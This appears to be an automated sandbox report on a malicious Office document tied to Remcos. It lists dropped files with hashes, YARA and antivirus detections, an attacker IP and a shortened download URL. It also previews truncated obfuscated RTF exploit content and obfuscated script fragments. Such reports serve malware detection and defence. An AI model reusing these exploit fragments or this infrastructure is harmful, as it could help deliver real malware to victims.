7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
                                                                      No context
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 131072
Entropy (8bit): 0.025630255835805735
Encrypted: false
SSDEEP: 6:I3DPcfCo7FvxggLR3jqEqtCJkDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPNod3quJsvYg3J/
MD5: BBD11F270D6870E9F44AF512EC81005C
SHA1: 3EB001FCCB24E107F8F8B9CC58B34DA2ADAE9F78
SHA-256: C88651DCB44162513A04F47447CD3A7A1BD8B950ECC10CC8602F96251E0DD9F5
SHA-512: 9BD49FF4B67B5B6E3209304788B5B582EFEA4793A6563609004855D2411D2DD54ABC910B08C5AFD8DC84A39ADEBE4380780FE13E1537E33C8DF1311168B86430
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4760
Entropy (8bit): 4.834060479684549
Encrypted: false
SSDEEP: 96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5: 838C1F472806CF4BA2A9EC49C27C2847
SHA1: D1C63579585C4740956B099697C74AD3E7C89751
SHA-256: 40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512: E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious: false
Preview: PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):962
                                                                      Entropy (8bit):5.013811273052389
                                                                      Encrypted:false
                                                                      SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                      MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                      SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                      SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                      SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                      Malicious:false
                                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):83606
                                                                      Entropy (8bit):2.8490697963531684
                                                                      Encrypted:false
                                                                      SSDEEP:384:i0VT+0OFHYCvQNl3latdBig2xN5EaE43WHQQWbFVMHYrtr4bx+dPAkWy:vV+0o4EQNl3lSdBiPxNiaXOQb154bQvJ
                                                                      MD5:3DE898FD68C0A243530E7322DB8086AB
                                                                      SHA1:9995D08B73661BA9CB66961D765C33B4C197FB4D
                                                                      SHA-256:1CBF3C24A8097C1BED770CDC9982F76F3D986B5F66D0877D8DE371F0A5548FB2
                                                                      SHA-512:3EDB2F0F48D0B96E688BC51ACD0605F4291F63FF6B8D4E059931457A33B5FC70BA8AFCE94FC829D486E3D29F00E2CBF7AACAE44B2DCFD1288F7A9FE78092714B
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1..............{\*\shpdata71020718 \%}.{\9958772614_.|;8=;`4[)98$~]*-|/(|);0%]('?0|!,.`?.[71&&?#80~!~[+_(~79(:,?;>^,=]0%=38?!-.+_-5'?%..]|7?&3(&??-*~~8.5#??2.[|53=45_?[=%<=)9_$|~>$0;??.^._<4%9?+*$_)?7:]5|@?!#7.7#4.+2?])',-?!0;-6@<<[?#7^+%.-%',[/8)~`.6>@<:<._*:?<.(9?*.=?:&'-,;<2??7./3?+?@(=&.7#`&`,|0|:%~,.?&:8<!6-3?7@].[3#^$.4]0@.+6?&45??478^>]#?>(-3_.!|$^3*!80&&]`;!.*&./(_,*?>?/~287.7~+?.%$+9&.6>?>4/_>;&%=|?*2%%&.-+^!05,+^)$6.%?/!3-)4)??^5?++~7:.8|?:6%91$@?9~`.7%>`9@#.;<8_&&.6;5^?6+)_[2?55@/~2[??:=??[('?*116()6=&.5?:^%.$7#/)?&.*$==5.<+?9?/?;1.2`!]82;2^^?..?&[0&?_;2)`.?3..>|.?&>#2.$)8`56<93?<_?+5)9.,#710/;%89?'0<'88~<).`3;:7=:7~!$);:0[..6+2=(![??'22.978@;)*8&?7?='19#6?+[.42010&3$0^3%$.'7|)3!#>3/*95[<)0<.]?4.-??.9`.~..?&~.$2%:|8:5!;!95'--_*2]'?.6?9%(>$-:!;-?+*.?.?%.%:1'.]#,`?+*?$?3-27^`6=7.]%?._5?>2>2`1?&!?].>_]7!+.)*-+=?%9.=]=./6_..;..~?*..$=?,)[>?)%!??*8?^%95=>+())51?>%?1^76^?!@-3./~&>;7*>5?'?21[.<^0^`*~#<>?`5<=<9$!1<^?@&/``^.'49)'!;</<</1~%/%6<'?.?)[$64,%^=&)&(-$=,.?76$9%7%*3'?#/
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):183474
                                                                      Entropy (8bit):3.8646231642419524
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WJNuBK2J+KxCPpyHa6XgeeLgt5pzeyGw9HkJm4Ortmf3J2GtLRENhc8kVNYYN3I2:oEK2VsAggt5phGw9SCLEVwixi79UeUf
                                                                      MD5:A285D18480C6F6CC2D261CDE7354D19D
                                                                      SHA1:D44C64C965E46B6AB12BD418F07E671A50E74CA2
                                                                      SHA-256:6FE6D465B7B4E666A8B8AF9B0CE9BB28B731E097384F26C2E2C1376FB21F904A
                                                                      SHA-512:42BCDDFF6189953F0412D967E22DC8ACADAF1C64FB9D9FC868BCB21F097AC13ADB0C6FC6100375B6C94FD8F0022B63300F9A3BD029602D29E493DFD13C23F1C6
                                                                      Malicious:false
                                                                      Preview:......d.L.I.c.i.c.J.f.h.G. .=. .".q.z.L.W.G.G.W.S.L.L.".....c.m.p.L.L.A.f.P.G.s. .=. .".p.C.e.L.T.J.G.R.n.B.".....n.l.f.K.h.k.T.W.K.T. .=. .".z.C.L.m.P.J.A.o.m.x.".....A.N.C.j.G.q.j.i.W.W. .=. .".h.x.W.c.W.m.K.k.m.z.".....L.W.U.L.W.N.i.a.A.l. .=. .".K.z.i.U.L.i.g.r.k.z.".....k.A.e.k.G.m.b.k.B.f. .=. .".A.L.Z.z.n.A.W.O.B.d.".....b.h.d.f.A.H.m.g.p.L. .=. .".U.u.u.K.W.z.i.i.o.C.".........B.C.H.L.N.P.t.z.Z.L. .=. .".e.d.K.N.A.z.i.K.A.C.".....U.z.Z.G.L.G.p.o.U.f. .=. .".l.q.b.m.e.l.s.q.a.G.".....A.c.N.f.q.o.k.j.b.d. .=. .".W.o.U.U.W.K.I.W.K.K.".....k.z.L.v.i.k.u.W.G.j. .=. .".i.L.i.c.C.u.K.Z.T.Q.".....G.m.J.e.N.W.q.A.a.U. .=. .".C.z.G.L.f.o.c.G.W.L.".....K.m.L.e.s.N.o.z.U.v. .=. .".W.h.e.N.s.q.U.Z.i.c.".....S.m.N.z.k.q.L.v.H.G. .=. .".T.p.m.j.k.A.g.W.U.L.".....N.m.m.z.A.R.l.K.i.a. .=. .".N.Z.P.e.R.H.c.d.l.c.".....g.L.m.n.K.G.K.s.N.K. .=. .".a.h.q.O.n.A.n.a.u.q.".....i.r.O.l.L.N.z.W.e.P. .=. .".s.G.b.i.o.L.L.t.W.z.".........L.U.Q.K.k.T.K.U.L.o. .=. .".o.Z.L.n.i.U.Q.L.O.H.".....B.c.c.W.d.n.e.
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):4527404
                                                                      Entropy (8bit):3.8573411297737294
                                                                      Encrypted:false
                                                                      SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                                      MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                                      SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                                      SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                                      SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                                      Malicious:false
                                                                      Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):83606
                                                                      Entropy (8bit):2.8490697963531684
                                                                      Encrypted:false
                                                                      SSDEEP:384:i0VT+0OFHYCvQNl3latdBig2xN5EaE43WHQQWbFVMHYrtr4bx+dPAkWy:vV+0o4EQNl3lSdBiPxNiaXOQb154bQvJ
                                                                      MD5:3DE898FD68C0A243530E7322DB8086AB
                                                                      SHA1:9995D08B73661BA9CB66961D765C33B4C197FB4D
                                                                      SHA-256:1CBF3C24A8097C1BED770CDC9982F76F3D986B5F66D0877D8DE371F0A5548FB2
                                                                      SHA-512:3EDB2F0F48D0B96E688BC51ACD0605F4291F63FF6B8D4E059931457A33B5FC70BA8AFCE94FC829D486E3D29F00E2CBF7AACAE44B2DCFD1288F7A9FE78092714B
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1..............{\*\shpdata71020718 \%}.{\9958772614_.|;8=;`4[)98$~]*-|/(|);0%]('?0|!,.`?.[71&&?#80~!~[+_(~79(:,?;>^,=]0%=38?!-.+_-5'?%..]|7?&3(&??-*~~8.5#??2.[|53=45_?[=%<=)9_$|~>$0;??.^._<4%9?+*$_)?7:]5|@?!#7.7#4.+2?])',-?!0;-6@<<[?#7^+%.-%',[/8)~`.6>@<:<._*:?<.(9?*.=?:&'-,;<2??7./3?+?@(=&.7#`&`,|0|:%~,.?&:8<!6-3?7@].[3#^$.4]0@.+6?&45??478^>]#?>(-3_.!|$^3*!80&&]`;!.*&./(_,*?>?/~287.7~+?.%$+9&.6>?>4/_>;&%=|?*2%%&.-+^!05,+^)$6.%?/!3-)4)??^5?++~7:.8|?:6%91$@?9~`.7%>`9@#.;<8_&&.6;5^?6+)_[2?55@/~2[??:=??[('?*116()6=&.5?:^%.$7#/)?&.*$==5.<+?9?/?;1.2`!]82;2^^?..?&[0&?_;2)`.?3..>|.?&>#2.$)8`56<93?<_?+5)9.,#710/;%89?'0<'88~<).`3;:7=:7~!$);:0[..6+2=(![??'22.978@;)*8&?7?='19#6?+[.42010&3$0^3%$.'7|)3!#>3/*95[<)0<.]?4.-??.9`.~..?&~.$2%:|8:5!;!95'--_*2]'?.6?9%(>$-:!;-?+*.?.?%.%:1'.]#,`?+*?$?3-27^`6=7.]%?._5?>2>2`1?&!?].>_]7!+.)*-+=?%9.=]=./6_..;..~?*..$=?,)[>?)%!??*8?^%95=>+())51?>%?1^76^?!@-3./~&>;7*>5?'?21[.<^0^`*~#<>?`5<=<9$!1<^?@&/``^.'49)'!;</<</1~%/%6<'?.?)[$64,%^=&)&(-$=,.?76$9%7%*3'?#/
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):2.7551445675917683
                                                                      Encrypted:false
                                                                      SSDEEP:96:b2MPkt/XgVoPApC4/CMPnQlXgVoPApC4/:TPktYYGdPnQWYG
                                                                      MD5:AF348EB87C2C2C53EEFDB4906A16C410
                                                                      SHA1:89944DEB511391BDC14224F54970CD5F782368EB
                                                                      SHA-256:31A458DC7D4299B43F2692358A26A7BAFBB15ED0430356AFCAF5A0894D615312
                                                                      SHA-512:98E1CBA181989306BF811CAA1A1F21D2C12D4F5334BC5DE4A09FC9E1A0D98D56D65982B1F389D193012F91CBECAB389A28A5971948AF1FD6448A6074A25F77C0
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):3.6046860965124106
                                                                      Encrypted:false
                                                                      SSDEEP:384:rmoRJLOnSlykANrg99+raLDdxJBbCK/St64HG+pNt:BRISKKPKaLDz/b/as4HGGNt
                                                                      MD5:0EE116C979EAB0FD3A831E5753DDFC66
                                                                      SHA1:CD7364AB09A1375751E7A33B7545216A2D04EB20
                                                                      SHA-256:ADAF0E143231D9990114FCA3B41291222E053CA83F876A2FBE99FDBA97A774B4
                                                                      SHA-512:FAB22C14C4B74BED90E8E77AC2409C4908D34FF9E3A86EDB5FFD295F86AB7B95262A2F14DB33823FE5631EA7875D9CB8D690F12BA00818433B4BB3F802A367B4
                                                                      Malicious:false
                                                                      Preview:....................9.5.8.7.7.2.6.1.4._...|.;.8.=.;.`.4.[.).9.8.$.~.].*.-.|./.(.|.).;.0.%.].(.'.?.0.|.!.,...`.?...[.7.1.&.&.?.#.8.0.~.!.~.[.+._.(.~.7.9.(.:.,.?.;.>.^.,.=.].0.%.=.3.8.?.!.-...+._.-.5.'.?.%.....].|.7.?.&.3.(.&.?.?.-.*.~.~.8...5.#.?.?.2...[.|.5.3.=.4.5._.?.[.=.%.<.=.).9._.$.|.~.>.$.0.;.?.?...^..._.<.4.%.9.?.+.*.$._.).?.7.:.].5.|.@.?.!.#.7...7.#.4...+.2.?.].).'.,.-.?.!.0.;.-.6.@.<.<.[.?.#.7.^.+.%...-.%.'.,.[./.8.).~.`...6.>.@.<.:.<..._.*.:.?.<...(.9.?.*...=.?.:.&.'.-.,.;.<.2.?.?.7.../.3.?.+.?.@.(.=.&...7.#.`.&.`.,.|.0.|.:.%.~.,...?.&.:.8.<.!.6.-.3.?.7.@.]...[.3.#.^.$...4.].0.@...+.6.?.&.4.5.?.?.4.7.8.^.>.].#.?.>.(.-.3._...!.|.$.^.3.*.!.8.0.&.&.].`.;.!...*.&.../.(._.,.*.?.>.?./.~.2.8.7...7.~.+.?...%.$.+.9.&...6.>.?.>.4./._.>.;.&.%.=.|.?.*.2.%.%.&...-.+.^.!.0.5.,.+.^.).$.6...%.?./.!.3.-.).4.).?.?.^.5.?.+.+.~.7.:...8.|.?.:.6.%.9.1.$.@.?.9.~.`...7.%.>.`.9.@.#...;.<.8._.&.&...6.;.5.^.?.6.+.)._.[.2.?.5.5.@./.~.2.[.?.?.:.=.?.?.[.(.'.?.*.1.1.6.(.).6.=.&...5.?.:.^.%...$.7.#./.).?.&.
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x05bf0a1f, page size 32768, DirtyShutdown, Windows version 6.1
                                                                      Category:dropped
                                                                      Size (bytes):21037056
                                                                      Entropy (8bit):1.138861601008914
                                                                      Encrypted:false
                                                                      SSDEEP:24576:9O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:9OEXs1LuHqqEXwPW+RHA6m1fN
                                                                      MD5:CB4D369D51CCAC78DD3B05C9A5754A27
                                                                      SHA1:8A81BA817B60EFF6E903FE58A68F3E8D9C30876D
                                                                      SHA-256:3E1B39227C237F93FE0CE1C9C5E868AB62780945689F93EF6F22396D63774933
                                                                      SHA-512:64AC39C37F9F4A47EF416DCB489F8BF43E044415EB91D6EE389C14527F9D9878B5C52F8311C9A8035FA6CA57DF4DE8AA143000348CAFF03E05FB787213A80179
                                                                      Malicious:false
                                                                      Preview:....... ........................u..............................;:...{..05...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview:..
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025630255835805735
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPcfCo7FvxggLR3jqEqtCJkDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPNod3quJsvYg3J/
                                                                      MD5:BBD11F270D6870E9F44AF512EC81005C
                                                                      SHA1:3EB001FCCB24E107F8F8B9CC58B34DA2ADAE9F78
                                                                      SHA-256:C88651DCB44162513A04F47447CD3A7A1BD8B950ECC10CC8602F96251E0DD9F5
                                                                      SHA-512:9BD49FF4B67B5B6E3209304788B5B582EFEA4793A6563609004855D2411D2DD54ABC910B08C5AFD8DC84A39ADEBE4380780FE13E1537E33C8DF1311168B86430
                                                                      Malicious:false
                                                                      Preview:......M.eFy...zX...S..O...l.".;S,...X.F...Fa.q............................'...&lDD..|...(...........eS..E....}........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025519321670128242
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPcUGavxggLRf/tFdlpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPTblpHvYg3J/
                                                                      MD5:8CCD4C4F7E6CED4EB453CA65B0DFE7FE
                                                                      SHA1:388C5890D19F706C413467CB2EA87438BF92F7DD
                                                                      SHA-256:9E9E4E3EFC3D5CD40A0409E18D75EEFB0D75CA62AB35A0A64EA60B03E931BB35
                                                                      SHA-512:E79E62EC75E0F0EC4E02A8570629CEABB88783240211F8EF228737F991A825333F60A201DEDA3D35870E1DD3949332405E98F711A3FDB8820E17406C036BE482
                                                                      Malicious:false
                                                                      Preview:......M.eFy...zu-.Q.zB....\.S,...X.F...Fa.q............................i.....|G.T.....}..............5I.LO:.u.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.9688214574054784
                                                                      Encrypted:false
                                                                      SSDEEP:48:7ilGMlVIH4DVL1Qn4N9CUGyU0EkvMWG/uD5k10a/l:7ilX3CY9J9hUDWGGK1/l
                                                                      MD5:31D7B488C9DC7B95A6A1C09138CEB014
                                                                      SHA1:EA28B9372390AE6DEBD8E340314B0DDC0028C5DD
                                                                      SHA-256:F8B54E56B1520495A4BC974143CFA74759EE64A544F26B26A2CF7A91AC5E61FD
                                                                      SHA-512:1A282FD71CFE192199DB96F473C3724AD5C16E7F2C1813788D8ABA02F58A52557E03C817AEE6762DE0E9A882C6211FBCCE966B5094120C6AB3DBF513B37033D0
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/FoNVg0>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):49
                                                                      Entropy (8bit):4.606017559110707
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm2fz4wjv:HRYFVm4Uq
